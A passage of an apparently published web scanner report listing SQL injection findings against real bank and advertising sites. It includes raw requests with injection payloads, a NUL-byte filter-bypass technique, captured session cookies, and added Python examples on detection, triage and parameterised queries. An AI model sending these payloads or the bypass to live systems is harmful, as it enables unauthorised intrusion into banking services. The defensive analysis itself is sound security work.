33.54. http://www.ktb.co.th/flash/home_show_flash2.swf

33.55. http://www.ktb.co.th/flash/home_show_flash3.swf

33.56. http://www.ktb.co.th/flash/ktb_group_eng.swf

33.57. http://www.ktb.co.th/flash_eng/ktbslide_index.swf

33.58. http://www.nbcuniversalstore.com/nbcuniversalstore/layout/favicon.ico

33.59. http://www.scb.co.th/favicon.ico

33.60. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

33.61. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

33.62. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt

33.63. http://www.scriptlogic.com/_commonfiles/controls/omniturizer.aspx

33.64. http://www.set.or.th/menuFile/topMenu2009-th.js

33.65. http://www.zlmc.org/membership.html

33.66. http://www22.glam.com/cTagsImg.act

34. Content type is not specified

34.1. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html

34.2. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/1

34.3. http://www.bangkokbank.com/bangkok%20bank/pages/blank.gif

34.4. http://www.bangkokbank.com/favicon.ico

34.5. http://www.bangkokbank.com/layouts/NR/BangkokBank/images/homepage/head_line.gif

34.6. http://www.bangkokbank.com/online%20banking%20thai/for%20business/biz%20ibanking/pages/1

34.7. http://www.barclays.co.uk/images/popup_green.gif

34.8. http://www.bot.or.th/favicon.ico

34.9. http://www.bot.or.th/x26amp



1. SQL injection
There are 15 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
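The following is an added example and not part of the scanner report; it reproduces, against a constructed SQLite table, both detection heuristics this section relies on (the single-quote / double-quote error pair used in 1.1 to 1.3 and the `' and 1=1--` / `' and 1=2--` boolean pair used in 1.5), and shows why the parameterised form is immune to both. The table name, column names and sample rows are assumptions chosen to resemble the scanned asset paths.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the content store behind the scanned URLs
    (constructed sample data; the real schema is not visible in the report)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE assets (id INTEGER PRIMARY KEY, name TEXT, internal INTEGER)")
    conn.executemany(
        "INSERT INTO assets VALUES (?, ?, ?)",
        [(1, "webtrends-del.js", 0), (2, "styles.min.css", 0), (3, "admin-report.csv", 1)],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable form: the user-supplied path segment is concatenated into the
    query text, so a quote in the value changes the structure of the statement."""
    sql = "SELECT id, name FROM assets WHERE name = '" + name + "' AND internal = 0"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised form: the statement is fixed first and the value is bound
    second, so a quote is just one more character of data."""
    sql = "SELECT id, name FROM assets WHERE name = ? AND internal = 0"
    return conn.execute(sql, (name,)).fetchall()


def probe(lookup, conn: sqlite3.Connection, name: str):
    """Mimic one scanner request: 'error' if the query fails, else the row count."""
    try:
        return len(lookup(conn, name))
    except sqlite3.Error:
        return "error"


def quote_pair_signal(lookup, conn: sqlite3.Connection, base: str = "assets") -> bool:
    """Heuristic from 1.1-1.3: one quote errors, two quotes (an escaped quote
    inside the literal) make the error disappear."""
    one = probe(lookup, conn, base + "'")
    two = probe(lookup, conn, base + "''")
    return one == "error" and two != "error"


def boolean_pair_signal(lookup, conn: sqlite3.Connection, base: str = "styles.min.css") -> bool:
    """Heuristic from 1.5: a true and a false appended condition give different
    results only if the condition is actually evaluated by the database."""
    true_case = probe(lookup, conn, base + "' AND 1=1--")
    false_case = probe(lookup, conn, base + "' AND 1=2--")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("concatenated", lookup_unsafe), ("parameterised", lookup_safe)):
        print(
            label,
            "quote-pair:", quote_pair_signal(fn, db),
            "boolean-pair:", boolean_pair_signal(fn, db),
            "rows returned for ' OR 1=1--:", probe(fn, db, "' OR 1=1--"),
        )
```

With the concatenated query both signals fire and the `' OR 1=1--` value returns every row, including the one marked internal; with the bound parameter neither signal fires and the same value simply matches no asset name. Note that the quote-pair heuristic also fires on any component that merely fails on a stray quote, which is why the report marks 1.1 to 1.3 as tentative.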

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://group.barclays.com/assets/script/webtrends-del.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /assets/script/webtrends-del.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the error returned here is a generic Apache Tomcat HTTP 500 error report rather than a database error, and that the second request for a .js file is answered with an HTML page, so the behaviour may be a path-handling fault in the content server rather than a query that incorporates the path segment; treat this as unconfirmed until the cause of the error is established.

Request 1

GET /assets'/script/webtrends-del.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:16:38 GMT
Set-Cookie: JSESSIONID=71CDD23445113C60B2CB06C94195620D.tomcat_1_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /assets''/script/webtrends-del.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:16:39 GMT
Set-Cookie: JSESSIONID=6ACE2F0F7472083BE62948B07BAC43AB.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:16:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.2. http://group.barclays.com/html_phase_2/assets/css/styles.min.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/styles.min.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.1, the error is a generic Apache Tomcat HTTP 500 report and the follow-up request for a stylesheet is answered with an HTML page, so a path-handling fault in the content server is an equally plausible explanation; confirm the cause before treating this as injection.

Request 1

GET /html_phase_2/assets'/css/styles.min.css HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:17:15 GMT
Set-Cookie: JSESSIONID=D81550F023755505F38643106E91441F.tomcat_2_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /html_phase_2/assets''/css/styles.min.css HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:17:16 GMT
Set-Cookie: JSESSIONID=67E752F3A2B61A44311FA1405758F214.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:17:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.3. http://group.barclays.com/html_phase_2/assets/scripts/scripts.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/scripts/scripts.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.1 and 1.2, the error is a generic Apache Tomcat HTTP 500 report and the follow-up request for a script is answered with an HTML page, so this is the same unconfirmed path-handling behaviour and should be verified together with those two findings.

Request 1

GET /html_phase_2/assets'/scripts/scripts.min.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:16:57 GMT
Set-Cookie: JSESSIONID=D56D3BD784E0F6B00405F984F691332D.tomcat_2_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /html_phase_2/assets''/scripts/scripts.min.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:16:57 GMT
Set-Cookie: JSESSIONID=2E80AD84529825C357C813F48EA52886.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:16:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.4. http://html.aggregateknowledge.com/iframe [itemid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the itemid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL: the response contains an org.postgresql.util.PSQLException raised through an iBATIS SqlMapClient call (Item.findByCustomerItemId), and the full stack trace, including mapping file names, is disclosed in an HTML comment.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked. Note that the error shown ("invalid byte sequence for encoding "UTF8": 0x00") is PostgreSQL rejecting the NULL byte itself, which proves that the raw value reaches the database unfiltered but does not by itself show that the single quote alters the query structure; the trace says the error occurred "while applying a parameter map", which is consistent with the value being bound as a parameter. Confirm whether the quote actually changes query behaviour (for example, whether a true and a false appended condition give different results) rather than relying on the encoding error alone.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
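The following is an added illustration, not code from the report or from the vendor: it simulates the mechanism described above, a filter that treats its input as a NUL-terminated C string and therefore never sees the quote that follows %00, beside a length-aware filter and the application-level fix. The blocked-character set and the rule that itemid must be a decimal integer are assumptions; the real filter and validation logic of the target are not visible in the report.

```python
import re
from urllib.parse import unquote_to_bytes

# Characters the hypothetical front-end filter refuses (assumption; the real
# filter in front of the target is not visible in the report).
BLOCKED = re.compile(rb"['\";]")


def decode_param(raw_query_value: str) -> bytes:
    """Percent-decode a query-string value to the raw bytes the server handles,
    e.g. "298028%00'" -> b"298028\\x00'" (the payload from the report)."""
    return unquote_to_bytes(raw_query_value)


def filter_native_style(value: bytes) -> bool:
    """Simulated filter written in native code that treats the buffer as a
    NUL-terminated C string: everything from the first 0x00 onward is invisible
    to it. Returns True when the request would be allowed through."""
    visible = value.split(b"\x00", 1)[0]
    return BLOCKED.search(visible) is None


def filter_length_aware(value: bytes) -> bool:
    """Corrected filter: inspects the whole buffer and rejects an embedded NUL
    outright, since no legitimate parameter of this kind contains one."""
    if b"\x00" in value:
        return False
    return BLOCKED.search(value) is None


def is_valid_item_id(value: bytes) -> bool:
    """Application-level check: itemid is an integer (assumption), so accept only
    a short run of ASCII digits. This refuses the NUL byte that PostgreSQL
    rejected in the report, and every quote, before any query is built."""
    return re.fullmatch(rb"[0-9]{1,18}", value) is not None


def parse_item_id(value: bytes) -> int:
    """Parse a validated itemid so that only a bound integer ever reaches the
    database driver; callers then pass the int as a query parameter."""
    if not is_valid_item_id(value):
        raise ValueError("itemid must be a decimal integer")
    return int(value)


def walkthrough(raw_query_value: str = "298028%00'") -> dict:
    """Show what each layer decides for one encoded parameter value."""
    value = decode_param(raw_query_value)
    return {
        "bytes_seen_by_application": value,
        "native_filter_allows": filter_native_style(value),
        "length_aware_filter_allows": filter_length_aware(value),
        "application_accepts": is_valid_item_id(value),
    }


if __name__ == "__main__":
    for sample in ("298028", "298028'", "298028%00'"):
        print(sample, walkthrough(sample))
```

For the report's payload the native-style filter sees only `298028`, passes the request, and the full value including the quote reaches the database; the length-aware filter and the integer check both refuse it. The last two functions are the remediation the text calls for: fixing the application so that the filter is not the only line of defence.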

Request

GET /iframe?pid=32&itemid=298028%00'&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 03 May 2011 13:33:20 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
org.springframework.dao.DataIntegrityViolationException: SqlMapClient operation; SQL [];
--- The error occur
...[SNIP]...
commender/ItemDao.xml.
--- The error occurred while applying a parameter map.
--- Check the Item.findByCustomerItemId-InlineParameterMap.
--- Check the statement (query failed).
--- Cause: org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException:
--- The error occurred in mapping/recommender/It
...[SNIP]...

1.5. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [JSESSIONID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/IndividualSavingsAcctOverview.do

Issue detail

The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the JSESSIONID cookie. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 is the unauthenticated login page (title "Login Step 1 of 2"), which is what the application serves for any session identifier it does not recognise, and the server echoes the tampered identifier back in a new Set-cookie header; differences between the two responses may therefore come from session handling or dynamic page content rather than from a query, and the finding should not be reported without a controlled comparison.

Request 1

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d1--%20; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:27 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d1--%20:r4ap-RolbClusterB-server04; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>

<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />

<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />

<scr
...[SNIP]...

Request 2

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d2--%20; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:28 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="WT.cg_s" content="logon - Login" />
<
...[SNIP]...
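One way to do the manual review the note above asks for is to diff the two responses after discarding what varies between any two requests anyway. The script below is an added example, not part of the XSS.CX report: it parses two raw HTTP responses, ignores the Date header, drops Set-Cookie values that merely contain the injected probe, and reports what is left. The sample responses are constructed from the headers shown for 1.5 with short stand-in bodies (the report shows both real bodies to be the same 22636-byte login page); a third, constructed after the 500 in 1.7, serves as a positive control.

```python
"""Added example (not from the XSS.CX report): offline triage of a
difference-based SQL injection finding such as 1.5.  Strip what varies
between any two requests (Date, cookies that merely echo the probe) and see
what difference is left.  Sample responses are constructed from the headers
in 1.5; bodies are short stand-ins for the identical 22636-byte login page.
"""
from typing import Dict, List, Tuple

# The two probes the scanner injected into JSESSIONID in finding 1.5.
PROBES = ["'%20and%201%3d1--%20", "'%20and%201%3d2--%20"]

LOGIN_PAGE = "<title>Barclays Online Banking - Login Step 1 of 2</title>"  # stand-in

RESPONSE_1 = "\n".join([
    "HTTP/1.1 200 OK",
    "Date: Tue, 03 May 2011 12:55:27 GMT",
    "Content-type: text/html",
    "Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06"
    "'%20and%201%3d1--%20:r4ap-RolbClusterB-server04; Path=/; Secure",
    "Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/",
    "Content-Length: 22636",
    "",
    LOGIN_PAGE,
])

RESPONSE_2 = "\n".join([
    "HTTP/1.1 200 OK",
    "Date: Tue, 03 May 2011 12:55:28 GMT",
    "Content-type: text/html",
    "Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/",
    "Content-Length: 22636",
    "",
    LOGIN_PAGE,
])

# Positive control, constructed after the 500 in finding 1.7.
RESPONSE_500 = "\n".join([
    "HTTP/1.1 500 Internal Server Error",
    "Date: Tue, 03 May 2011 13:25:32 GMT",
    "Content-Type: text/html",
    "Content-Length: 764",
    "",
    "<p>Microsoft OLE DB Provider for ODBC Drivers</p>",
])


def parse_response(raw: str) -> Tuple[str, Dict[str, List[str]], str]:
    """Split a raw HTTP/1.x response into status line, headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0].strip(), headers, body


def drop_probe_echoes(cookies: List[str], probes: List[str]) -> List[str]:
    """Discard Set-Cookie values that merely contain the injected probe.

    A session cookie handed back with the payload inside it shows that the
    server echoed the input, not that the input reached a query.
    """
    return [c for c in cookies if not any(p in c for p in probes)]


def diff_responses(raw_a: str, raw_b: str, probes: List[str]) -> List[str]:
    """Return the differences that survive normalisation (empty = none)."""
    status_a, hdr_a, body_a = parse_response(raw_a)
    status_b, hdr_b, body_b = parse_response(raw_b)
    diffs = []
    if status_a != status_b:
        diffs.append(f"status: {status_a!r} vs {status_b!r}")
    for name in sorted((set(hdr_a) | set(hdr_b)) - {"date"}):
        a, b = hdr_a.get(name, []), hdr_b.get(name, [])
        if name == "set-cookie":
            a, b = drop_probe_echoes(a, probes), drop_probe_echoes(b, probes)
        if a != b:
            diffs.append(f"header {name}: {a} vs {b}")
    if body_a != body_b:
        diffs.append("body differs")
    return diffs


def verdict(raw_a: str, raw_b: str, probes: List[str]) -> str:
    """Summarise a response pair for the analyst."""
    diffs = diff_responses(raw_a, raw_b, probes)
    if not diffs:
        return "no significant difference: treat as a probable false positive"
    return "review manually: " + "; ".join(diffs)


if __name__ == "__main__":
    print(verdict(RESPONSE_1, RESPONSE_2, PROBES))
    print(verdict(RESPONSE_500, RESPONSE_2, PROBES))
```

Run against the 1.5 pair it reports no significant difference; against the 500/200 control it lists the status, Content-Length and body differences. When triaging for real, feed it the complete captured responses rather than the excerpts printed in the report.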

1.6. http://moneytalk.scb.co.th/index.asp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be IBM DB2, judging by the [IBM][CLI Driver] prefix in the error. Two caveats apply. First, the payload is a Transact-SQL time-delay construct (WAITFOR DELAY), which DB2 does not implement, so no timing evidence can be expected from it. Second, SQL30081N is the DB2 CLI communication error (the driver could not reach the database server), not a syntax or parse error; it shows that index.asp talks to DB2 through ODBC and leaks driver errors into the page, but it does not by itself show that the Referer value was incorporated into a statement. Finding 1.7 received the identical SQL30081N from a different injection point, so repeat this request with a benign Referer to rule out a database that was simply unreachable at the time.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.asp?FileName=TH HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:26:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=HMOJLEJDAIANBDHNMEMJPCJK; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
<font face="Arial" size=2>[IBM][CLI Driver] SQL30081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected:
...[SNIP]...

1.7. http://moneytalk.scb.co.th/index.asp [name of an arbitrarily supplied request parameter]

Summary

